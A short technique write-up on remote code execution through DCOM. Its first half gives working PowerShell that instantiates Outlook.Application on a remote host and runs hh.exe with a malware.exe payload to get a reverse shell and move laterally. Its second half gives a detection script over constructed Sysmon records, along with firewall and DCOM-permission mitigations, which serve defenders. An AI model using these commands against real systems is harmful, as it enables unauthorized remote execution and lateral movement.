XCCVLTVM

Using LOLBins via COM Objects for Reverse Shell

A COM object is created remotely on the target machine (192.168.1.5) using the Outlook.Application ProgID. This technique demonstrates remote instantiation of a COM object over the network.

$com = [Type]::GetTypeFromProgID('Outlook.Application', '192.168.1.5')
$object = [System.Activator]::CreateInstance($com)

This command lists all methods containing "Create" in their names within the instantiated COM object. It helps identify potential method calls for further exploitation.

$object | Get-Member -Name "*Create*"

This leads to lateral movement, as the executed binary contains a reverse shell, allowing the attacker to gain remote access to the compromised system.

$object.CreateObject("Shell.Application").ShellExecute("C:\Windows\SysWOW64\hh.exe", "C:\Users\malefic\Desktop\malware.exe", "", "", 1)

Code execution is achieved using a Living off the Land Binaries (LOLBins) approach. The Shell.Application COM object is used to invoke hh.exe, which then executes a malicious payload (malware.exe).
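The chain above leaves two distinctive traces on the target host: an outlook.exe process whose parent is the DCOM launcher service (svchost.exe -k DcomLaunch) rather than an interactive user, and hh.exe being handed a path that is not a .chm help file. The following detection script is an added example written for this page, not code from the original write-up; it runs over constructed Sysmon-style process-creation records (field names mirror Sysmon Event ID 1: Image, ParentImage, CommandLine, ParentCommandLine) and flags both signals. The sample records, paths and user names in it are invented for illustration.

```powershell
# Added detection example (not part of the original write-up).
# Scans process-creation records for the DCOM + hh.exe LOLBin pattern.

function Test-DcomLolbinEvent {
    param([Parameter(Mandatory)][hashtable]$Event)

    $reasons = @()
    $image  = [System.IO.Path]::GetFileName($Event.Image).ToLower()
    $parent = [System.IO.Path]::GetFileName($Event.ParentImage).ToLower()

    # Signal 1: Outlook started by the DCOM activation service instead of a user.
    # A remotely instantiated Outlook.Application object produces exactly this parent.
    if ($image -eq 'outlook.exe' -and
        $Event.ParentCommandLine -match 'svchost\.exe.*-k\s+DcomLaunch') {
        $reasons += 'outlook.exe activated via DCOM (parent: svchost -k DcomLaunch)'
    }

    # Signal 2: hh.exe normally opens .chm files; any other argument is the
    # LOLBin execution pattern. Strip the hh.exe path, then inspect what is left.
    if ($image -eq 'hh.exe') {
        $argString = ($Event.CommandLine -replace '^\s*"?[^"]*hh\.exe"?\s*', '').Trim()
        if ($argString -and $argString -notmatch '\.chm("|\s|$)') {
            $reasons += "hh.exe launched with non-CHM argument: $argString"
        }
        # Stronger still when an Office process is the one launching hh.exe.
        if ($parent -eq 'outlook.exe') {
            $reasons += 'hh.exe spawned by outlook.exe'
        }
    }
    return $reasons
}

function Find-DcomLolbinActivity {
    param([Parameter(Mandatory)][hashtable[]]$Events)
    foreach ($e in $Events) {
        $hits = Test-DcomLolbinEvent -Event $e
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                Host    = $e.Host
                Image   = $e.Image
                Reasons = ($hits -join '; ')
            }
        }
    }
}

# Constructed sample records (hypothetical host, paths and users).
$sampleEvents = @(
    @{ Host = 'WS01'; Image = 'C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE'
       ParentImage = 'C:\Windows\System32\svchost.exe'
       CommandLine = '"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE" -Embedding'
       ParentCommandLine = 'C:\Windows\system32\svchost.exe -k DcomLaunch -p' },
    @{ Host = 'WS01'; Image = 'C:\Windows\SysWOW64\hh.exe'
       ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE'
       CommandLine = '"C:\Windows\SysWOW64\hh.exe" C:\Users\example\Desktop\payload.exe'
       ParentCommandLine = '"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE" -Embedding' },
    # Benign: user opened a help file from Explorer.
    @{ Host = 'WS02'; Image = 'C:\Windows\hh.exe'
       ParentImage = 'C:\Windows\explorer.exe'
       CommandLine = '"C:\Windows\hh.exe" "C:\Help\Product.chm"'
       ParentCommandLine = 'C:\Windows\Explorer.EXE' }
)

Find-DcomLolbinActivity -Events $sampleEvents | Format-Table -AutoSize
```

Only the two WS01 records are reported; the Explorer-launched .chm on WS02 is left alone. To run this against live data instead of the constructed records, map Sysmon Event ID 1 properties into the same hashtable fields (Get-WinEvent on the Microsoft-Windows-Sysmon/Operational log). On the prevention side, the remote instantiation step depends on inbound RPC (TCP 135 plus the dynamic endpoint) reaching the host and on the caller holding Remote Activation rights for the application, so host firewall rules and the DCOM launch and activation permissions are the two controls that break the chain before hh.exe is ever reached.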